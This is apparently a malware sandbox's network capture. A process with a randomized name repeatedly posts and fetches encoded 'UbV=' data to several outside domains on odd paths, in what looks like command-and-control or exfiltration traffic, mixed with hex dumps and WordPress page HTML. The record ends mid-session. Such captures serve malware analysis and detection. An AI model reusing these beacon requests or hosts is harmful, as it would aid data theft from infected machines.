                            Data Raw: 33 30 66 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 77 db 46 92 e8 67 e9 57 74 e8 49 28 6e 08 10 8d 37 48 49 99 8c c7 b3 eb 73 a2 89 37 76 76 ee ac ed eb 03 82 4d 12 36 08 20 00 a8 e7 ea f7 ec b9 7f 63 7f d9 3d 55 d5 78 51 a0 48 59 f6 6c f6 5e 79 26 52 0b e8 ae 57 57 55 bf aa 1a c7 df fc f9 e7 e7 6f fe fe ea 05 5b 16 ab e8 f4 f0 f8 1b 45 79 1b ce d9 cb 17 cc 63 ef 4f d9 31 3c 66 91 1f 2f 4e 7a 22 56 7e 7d dd 63 41 e4 e7 f9 49 2f 14 1e 8b 12 7f 16 c6 0b 25 0f 0b c1 e2 44 f9 98 f7 4e d9 f1 37 6f 45 3c 0b e7 ef 15 a5 05 cf dd 05 cf 7d 00 bc a3 45 21 90 c8 c1 7f 7c 73 f4 f2 c5 e0 fd 29 bc 39 dd 0e 7e 0b 68 45 69 83 5f 0a 7f 76 7a 78 70 bc 12 85 cf 82 a5 9f e5 a2 38 e9 fd fa e6 2f 8a db 63 23 78 13 85 f1 27 96 89 e8 a4 97 66 c9 3c 8c 44 8f 2d 33 31 3f e9 2d 8b 22 1d 8f 46 8b 55 ba 50 93 6c 31 ba 9c c7 23 ce ef b6 0a e3 c5 d4 0f 3e 35 9b e5 e3 d1 e8 e2 e2 42 0d 8b fc 63 f2 31 c9 c3 0b 3f 57 83 64 35 ba 5c 45 59 1a a8 e9 32 45 38 44 56 ec af c4 49
                            Data Ascii: 30f1}kwFgWtI(n7HIs7vvM6 c=UxQHYl^y&RWWUo[EycO1<f/Nz"V~}cAI/%DN7oE<}E!|s)9~hEi_vzxp8/c#x'f<D-31?-"FUPl1#>5Bc1?Wd5\EY2E8DVI
                            Jul 16, 2024 07:24:14.799156904 CEST | 1236 | IN | Data Raw: 6f 91 24 8b 48 20 3f ca b9 c8 c2 79 18 f8 45 98 c4 3d 16 24 71 21 e2 e2 a4 f7 2f f3 eb 57 2f 8b fc c7 b3 9f 8b dc ba 34 c4 cb 7f fb f7 e9 73 7d ed b9 53 e5 5f 4d fd 57 3e fd 67 2f 7a a3 fd f6 8b bd fa bb 24 33 0f b2 30 2d 4e 8f e6 eb 38 00 60 47
                            Data Ascii: o$H ?yE=$q!/W/4s}S_MW>g/z$30-N8`G TQW5ihn}7vp4KJZ^D~&#W?KI+.q3q9d$ Cq&Y`"8Ca~$Np^Qf%Y*3vKV,{{
                            Jul 16, 2024 07:24:14.799303055 CEST | 1236 | IN | Data Raw: 05 53 eb 3e ea 5b d5 35 6d a6 b9 e6 3d 42 29 85 0d d4 bb 62 c6 e7 c1 7d b0 9b b5 35 db 33 84 71 5f ed 74 9d a5 11 54 f5 a6 16 17 9b 3c 2e c0 46 44 5c dc 81 ad 14 c9 06 00 50 35 3f ab 5a 1c 71 c3 9a 89 c5 30 5b 4c fd 23 7b c8 4d 67 a8 eb ce 90 0f
                            Data Ascii: S>[5m=B)b}53q_tT<.FD\P5?Zq0[L#{Mg-<<5tP`+MbP!w65wm'}b-}]kbkH!4$@%k9]'pO';:`{CCYI?[)y*"[EC0:\
                            Jul 16, 2024 07:24:14.799339056 CEST | 1236 | IN | Data Raw: 6c f7 d1 df e3 f4 6c 37 fc ae 31 b4 eb 44 f0 51 74 74 42 ec 9c 0f 6c 9e e5 3d 0a ed 5d 70 5b 71 96 27 7a 5f 00 5f 09 ea 3e 1d 84 33 bc 2f a3 6e 00 69 9b 9f c7 23 bb 47 a1 a9 c1 74 e0 68 1f ce 3d 0a 4f 1b 54 07 ae f2 78 ee 51 58 4a 20 1d f0 f1 78
                            Data Ascii: ll71DQttBl=]p[q'z__>3/ni#Gth=OTxQXJ x>?: nu'yv}@l!^vly*!eh`PRd!=/7uR$RJtG]$f(O_MS<VLJ\0TaaN(,lf"&_
                            Jul 16, 2024 07:24:14.799751043 CEST | 896 | IN | Data Raw: e0 89 92 39 ab f0 be d5 de b3 93 13 d6 a7 34 d5 fe a0 84 ce 4e 5a 75 26 0f 03 ca 37 80 56 94 b6 c0 f2 87 82 d5 09 6c 32 fd 08 79 a5 83 06 d7 2d b8 fa fb 7b 84 80 12 2c 27 01 6f f7 a3 a0 92 49 83 29 f6 dd 77 e5 f3 46 ae 7e fe fd 68 11 0e 59 bf 3f
                            Data Ascii: 94NZu&7Vl2y-{,'oI)wF~hY?`>@of|}jIrR}Xd&~d&18`0Z~U4B?*?]MG:(>%!^De<Ong{WD!~ma:~.&2}p
                            Jul 16, 2024 07:24:14.799783945 CEST | 1236 | IN | Data Raw: 3c 5d 78 e4 47 af 24 1a 44 a7 e6 69 14 16 47 6d b2 07 6a 1e 85 81 38 52 f8 40 4d 93 74 2b d1 b8 7d 70 d4 b5 21 d2 58 b2 0c ef 99 00 48 df fb 21 9c e5 63 f6 b6 62 7c a0 c2 ae ee 51 5f f2 fa 21 9c f5 07 ec fd 70 27 18 50 cb 31 2b 9b f5 87 f7 2c ab
                            Data Ascii: <]xG$DiGmj8R@Mt+}p!XH!cb|Q_!p'P1+,D/3f__mskunWx];qO&c8&a9)b),-o:](W}s>5=CnGqeGQkEx(1{d=G~&4|pB+_
                            Jul 16, 2024 07:24:14.799820900 CEST | 1236 | IN | Data Raw: ac c0 80 e4 67 10 a4 7d e7 31 dd df 74 f7 39 e5 c0 f5 f0 6e 68 bf a4 23 ff 04 f3 13 98 f5 91 01 28 99 1c d6 e1 e2 6f 39 e5 c3 a1 ae 77 fa fa 53 98 b2 22 29 e7 4d c7 23 1f 98 82 c1 12 bb 8d 06 3f 00 7f 70 78 70 4c 5e 1c df 50 b1 ba 6c 5c be 41 4a
                            Data Ascii: g}1t9nh#(o9wS")M#?pxpL^Pl\AJ0tqJfRC?j;\GpNp~0A9sl cT3IrVE*"Qnl!!9E%c{{2d-Y#u>yFC&_c2LV~@$
                            Jul 16, 2024 07:24:14.799854040 CEST | 1236 | IN | Data Raw: 85 bb 9a b4 e3 8f 7a a7 df 3d 33 ec 89 94 bb a6 6a da f1 08 81 d0 83 ba 3f ca d2 61 37 b9 28 66 dc f3 a8 17 f4 50 af c8 92 78 71 aa c1 36 29 96 0e 9b 7d 4c 5d cc 1e b8 52 da 5c 11 c2 5a e8 22 9c 2d 44 f1 01 ae 2f 80 6f 7e e2 ce 7a e7 ae 60 57 c5
                            Data Ascii: z=3j?a7(fPxq6)}L]R\Z"-D/o~z`WraYiWab_~ ViqD_V1~tpXy'rKvV~Cn>t&6kbrWM9[ <@ozC'^Tvly.
                            Jul 16, 2024 07:24:14.800635099 CEST | 1236 | IN | Data Raw: 15 5c 13 79 d4 a8 9b 0c 07 1a 73 13 3b 15 24 69 58 1c fc 28 d7 10 bf 0d cc 72 fc a9 9b d8 4f 16 f2 e4 98 38 52 da 0e 84 87 aa 2e a7 df b6 61 a2 dd b8 2e 7a 6c 0f 7c a3 a1 73 b0 3b 0f 41 e8 e0 f5 0d 0f 3c 9b e6 59 30 90 18 80 d3 75 5d 66 a8 b6 0d
                            Data Ascii: \ys;$iX(rO8R.a.zl|s;A<Y0u]f eufNPYWn0C.KD&h^Bi9 >dtr|O#ApLM=SA@(>*^*q]:V'e,g9T^H-io6 2PwtBba-h9g
                            Jul 16, 2024 07:24:14.800671101 CEST | 1236 | IN | Data Raw: 9a ff 12 12 b0 cb d2 33 55 7c 54 65 f4 1c b0 f7 e7 e8 52 cb a8 0c 3f 0d 94 11 37 cb 96 ba aa 55 ee 5a 57 ed ba 17 c0 6a 4a e5 d4 70 56 eb 95 45 69 52 30 ad a5 05 81 ce 2a 0f 8c 9c 59 ac 31 22 30 d9 35 58 2e f5 55 d3 38 5a 9d 23 55 0a 48 b2 36 64
                            Data Ascii: 3U|TeR?7UZWjJpVEiR0*Y1"05X.U8Z#UH6dl0vZ<ZzCe3pG4,-4`%4m-|k_RDueHIcM:UK7+E`_^m,yepmGGdv`2PL+VA)lRz!0.Q.4f90@pN
                            Jul 16, 2024 07:24:14.800708055 CEST | 1236 | IN | Data Raw: 35 28 32 0c bb d0 35 8d 12 30 46 37 c9 3e 90 65 b4 1d 24 9e 6c 8e 1c 84 4d c7 43 16 2e 18 a0 92 69 23 3a ae 5b e7 3a 9e f4 44 a6 0c 19 72 5c 0e 72 71 f0 44 c1 c1 50 27 9d 97 f1 69 a8 4e 78 a0 64 c9 b2 0c 95 41 17 65 53 9f 31 b3 dc 5b 92 a6 29 25
                            Data Ascii: 5(250F7>e$lMC.i#:[:Dr\rqDP'iNxdAeS1[)%eDZYFM>8(1LZ4s%e}AG"{KP_4qK}A JGdJGL{S\%KeT"WZGFG@>uq52_!L7[gHKo*}7W{5QY


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            39 | 192.168.2.4 | 49776 | 172.67.196.1 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:24:15.701601982 CEST | 10745 | OUT | POST /0koa/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.itsjojosiwas.com
                            Origin: http://www.itsjojosiwas.com
                            Referer: http://www.itsjojosiwas.com/0koa/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 72 6d 4a 54 2f 41 2f 71 64 4d 32 35 54 68 75 65 51 35 4e 61 76 78 6a 67 30 56 68 65 4d 31 55 77 77 48 55 75 2b 48 46 57 71 33 48 44 4f 6b 51 67 64 57 39 47 49 6c 79 74 4c 42 52 71 46 57 2b 70 46 4b 6d 32 50 43 6c 32 74 6a 57 44 55 78 36 42 7a 2b 44 48 36 78 61 67 2f 4b 70 2f 39 37 47 64 6c 6f 32 78 49 69 64 47 54 39 42 4c 49 36 61 73 64 47 73 4c 7a 35 49 4c 45 41 38 41 48 2f 67 53 6a 71 77 38 54 4d 49 70 49 39 50 39 33 4b 41 65 70 56 6f 69 32 54 6c 46 37 50 49 46 79 36 47 6c 45 58 4d 31 6e 48 4e 5a 4b 55 43 77 71 59 4c 4b 4f 61 2b 65 6e 4f 53 4d 4a 62 6f 5a 63 2f 51 32 7a 42 4f 65 4c 59 5a 43 68 4a 38 43 46 6b 6b 50 53 42 59 53 4d 49 6c 32 50 48 4a 38 33 6c 61 47 34 39 45 32 72 6e 6d 39 53 77 78 7a 4b 59 68 4f 68 78 74 6a 59 69 71 75 59 48 75 54 56 39 57 73 2b 63 2f 71 7a 7a 31 4d 6d 4f 6d 46 79 6c 79 4f 73 5a 54 70 43 6e 47 77 55 75 4e 6f 46 76 30 32 67 30 66 4b 59 6b 4b 2f 58 33 6c 32 7a 6c 36 67 61 59 50 51 57 53 43 72 59 32 55 4b 50 48 65 6a 36 6d 6f 73 44 55 4b 70 4c 2b 33 31 71 4e [TRUNCATED]
                            Data Ascii: UbV=[TRUNCATED]


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            40 | 192.168.2.4 | 49777 | 172.67.196.1 | 80 | 1668 | C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 16, 2024 07:24:18.276628971 CEST | 370 | OUT | GET /0koa/?UbV=mkhz803NSe67VDi/XqoOvDTg0lhLFFwDmFAH6HAD7lWiJHUqLX0wanSTKUh9Wz+qOKuxLFQRu1GlWT2p2cyKlA2Zual+9OKI76CIESdTTdJvOpGtX0Yw5/M=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.itsjojosiwas.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:24:19.765765905 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Vary: Accept-Encoding
                            Set-Cookie: CSRF=1721107458873; path=/
                            Set-Cookie: PHPSESSID=oh1qlrjchi3ieb6kumhn30vg1c; path=/
                            Pragma: no-cache
                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                            Cache-Control: no-cache, must-revalidate, max-age=0
                            Link: <https://www.itsjojosiwas.com/wp-json/>; rel="https://api.w.org/"
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Tr13Z8%2BW9oolTbsEUDD%2BYtwE%2BwIivvxrVfK%2FBDsuVX2M1v%2BTSlJvFGhb7Td%2BVlpEX%2Fk6EXiopC0Rq3HVKvlzRaG6qKHAmRhWWM%2Flx%2F%2FWTZcHe5AlGDEX7NMq6Nnvk2wn2JZyiSiVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a3f90b0b8204232-EWR
                            alt-svc: h3=":443"; ma=86400
                            Data Raw: 37 63 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 69 65 39 20 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 69 65 38 20 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 65 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66
                            Data Ascii: 7c23<!DOCTYPE html>...[if IE 9 ]> <html lang="en-US" class="ie9 loading-site no-js"> <![endif]-->...[if IE 8 ]> <html lang="en-US" class="ie8 loading-site no-js"> <![endif]-->...[if (gte IE 9)|!(IE)]>...><html lang="en-US" class="loading-site no-js"> ...<![endif]--><head><meta charset="UTF-8" /><link rel="prof
                            Jul 16, 2024 07:24:19.765811920 CEST | 1236 | IN | Data Raw: 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 74 73 6a
                            Data Ascii: ile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="https://www.itsjojosiwas.com/xmlrpc.php" /><meta name="google-site-verification" content="HfzPItsAMOts5x3eIVZbC2u98b-Q42U1bG9lT0qR6mY" /><script>(function(html){html.classNam
                            Jul 16, 2024 07:24:19.765846968 CEST | 1236 | IN | Data Raw: 22 7d 5d 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 55 53 22 7d 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 2f 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 2e 20 2d 2d 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e
                            Data Ascii: "}],"inLanguage":"en-US"}]}</script>... / Yoast SEO plugin. --><link rel='dns-prefetch' href='//www.itsjojosiwas.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link href='https://fonts.gstatic.com' crossorigin rel='pr
                            Jul 16, 2024 07:24:19.766629934 CEST | 672 | IN | Data Raw: 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28
                            Data Ascii: adius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css' type='t
                            Jul 16, 2024 07:24:19.766675949 CEST  1236  IN
                            Data Ascii: r--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp
                            Jul 16, 2024 07:24:19.766710997 CEST  1236  IN
                            Data Ascii: 35deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradien
                            Jul 16, 2024 07:24:19.766745090 CEST  1236  IN
                            Data Ascii: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}
                            Jul 16, 2024 07:24:19.767163992 CEST  1236  IN
                            Data Ascii: out-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !impor
                            Jul 16, 2024 07:24:19.767199039 CEST  1236  IN
                            Data Ascii: }.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(
                            Jul 16, 2024 07:24:19.767232895 CEST  1236  IN
                            Data Ascii: bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(
                            Jul 16, 2024 07:24:19.771111012 CEST  1236  IN
                            Data Ascii: ar(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !importa


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                            41          192.168.2.4  49778        64.46.102.70    80                1668  C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp                             Bytes transferred  Direction  Data
                            Jul 16, 2024 07:24:25.435718060 CEST  628  OUT  POST /9grl/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.kera333.org
                            Origin: http://www.kera333.org
                            Referer: http://www.kera333.org/9grl/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=y/k9F3K+G4JMORMsMUWZFhcQhjuJgtTi6MGxsfE/I+JtAOgkOMqmUgdDuAJL5HWK38Jg8/1SXdYxMWZLhQJvneo8DdvmquednDAv9CPZ9YgVkCgZcyFjtI4ftbj8JXwYVFDj4LYl48S2r3F52FInX0NpdfzOx3ZMSfPvHef2cum6Q8+e7C6aKn+XgEm3dYiBvg==
                            Jul 16, 2024 07:24:25.896580935 CEST  479  IN  HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:25 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                            42          192.168.2.4  49779        64.46.102.70    80                1668  C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp                             Bytes transferred  Direction  Data
                            Jul 16, 2024 07:24:27.972400904 CEST  648  OUT  POST /9grl/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.kera333.org
                            Origin: http://www.kera333.org
                            Referer: http://www.kera333.org/9grl/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=y/k9F3K+G4JMPxcsOzCZURcTqDuJ6dTm6MKxsa9iLMdtOPQkcY+mXgdDkgJCznXE38Vo8+ZSXekxMXpLhHdumOo+L9vkuuednDAv9CqM9Y4VkSQZOjFkr44e7Lj8fXxTVFCG4OAD45e2r1N51XgoY0NvZfyj3EoDLKGbPN/FUsKsR6vEqzbNYnak9DvDQbfI0qOOBupQllLg1H+kPHjZrVM=
                            Jul 16, 2024 07:24:28.423260927 CEST  479  IN  HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:28 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                            43          192.168.2.4  49780        64.46.102.70    80                1668  C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp                             Bytes transferred  Direction  Data
                            Jul 16, 2024 07:24:30.512422085 CEST  10730  OUT  POST /9grl/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.kera333.org
                            Origin: http://www.kera333.org
                            Referer: http://www.kera333.org/9grl/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=y/k9F3K+G4JMPxcsOzCZURcTqDuJ6dTm6MKxsa9iLNltO9YkOp+mWgdDoAJHznXJ38NW8+FCXYoxelxL0CxupOo+J9vnqufAnDRo9CaM9Y4VkQ4ZNyFkp44ftbjwJXw0VFa84ON44qW2qVd5mUIoR0NtU/y73ElDLKyhPMaNUtysR8SC2AGQNEnioTilR7aRsLeaP+Zpy0n/9F3sV1ecwhl0h4yL6cEWPXYdBjZqMxjiTkJpWPYFpPKkMNV3JWIHcpAT9z59kjP/HiPB6WkB5VZpCYq55zHRozwC9HS0tOPgDod6WIAJUFWI6Hjqr2ZouBTyZUpq2XGS+Byy/f0z65fDiFzn2jAbY7oLmxDKR/Q8bm/d9EefwmlM7hR9mY/rVSAIGHAMAIs906v0VrVZv8daqaqBu8fk9GR82MmutIOPbEpkh+DCP7ioIHrJ3jyVXZwuXGkDTblappP4ePFXl8xqrKlB9opPoWOvvXTymS5FQRJxO/XCPwuelmVlVx2bWE2/leToCGMEenFmHlkwp0rewsExS/i5zt6F0PGXlVTbKLgInoqq2mCAJcfqgwfY/7xRTEIOZGqIIheZ4GrVb+BbR2wADEpoqI32NxhD3IkzmpJlris4cI9g7txd6mY9gz8AWvtGnG+jGwtgkSSFUVkXk3fT8/EOaO/CYBLpWnbYz8kyfkreSSzY0W668Qzyn5WbzNO2EbGFiq8yWY8F8jO6NVSXTIJ3wXOwOtBHeV08Z22i+21DTHFJ4CfKC/W1AZEABvQJNjJek5WRu/gw4HC2wNI/IZk4yGu+dd5cv9uT2us818TU8HdZhNnk3c32rRtuxy70UZV3j15djXVXPqblkm2cqNVcuUF8chESCQuAqBZ4wRBwcqPe0XQMMQ0l7UMUDQSYfdmKpyLllLQzmo/J2YAmtL3txjIcDbRnc1eSzREZb9cLuY/f+Z1d40L4ryhNuPwBD81Y4+VIWV+L/Y+c/MtgK9M4zxnHHJR5Tw0MkY2G [TRUNCATED]
                            Jul 16, 2024 07:24:30.956948996 CEST  479  IN  HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:30 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                            44          192.168.2.4  49781        64.46.102.70    80                1668  C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp                             Bytes transferred  Direction  Data
                            Jul 16, 2024 07:24:33.047720909 CEST  365  OUT  GET /9grl/?UbV=/9MdGCeeA5FyGWImDjb6SSoEi2eI86nByvS7j/dpG/wpEvIodpeda31qunpqinbT/PdN7YoBB4YXLVBs6DMrn+UTK6ScrsDz3wZvnBGs6Z4ywzADABVVsu0=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.kera333.org
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:24:33.495090961 CEST  479  IN  HTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:33 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                            45          192.168.2.4  49782        3.33.130.190    80                1668  C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            Timestamp                             Bytes transferred  Direction  Data
                            Jul 16, 2024 07:24:38.550257921 CEST  634  OUT  POST /0x0m/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.lmsforsme.com
                            Origin: http://www.lmsforsme.com
                            Referer: http://www.lmsforsme.com/0x0m/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Ascii: UbV=VUvN4rU/1iY3a9Lw7uocz0KLXuomzJS8ZgYQYnqYE9SaPz7ApCZxCuOdqZ/LfrZpjXzfvFFx4UWUX8gw45euu2Eun8REBjfn3FI5rzRjrGLRaONzDcbYFLa/SbXr9D/papMB4YsHtyr1XzP4iiT7qLdpWDXPEKbFJJtkb82NgxHa+y73+CKz04tD15WQqhcK1Q==


                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
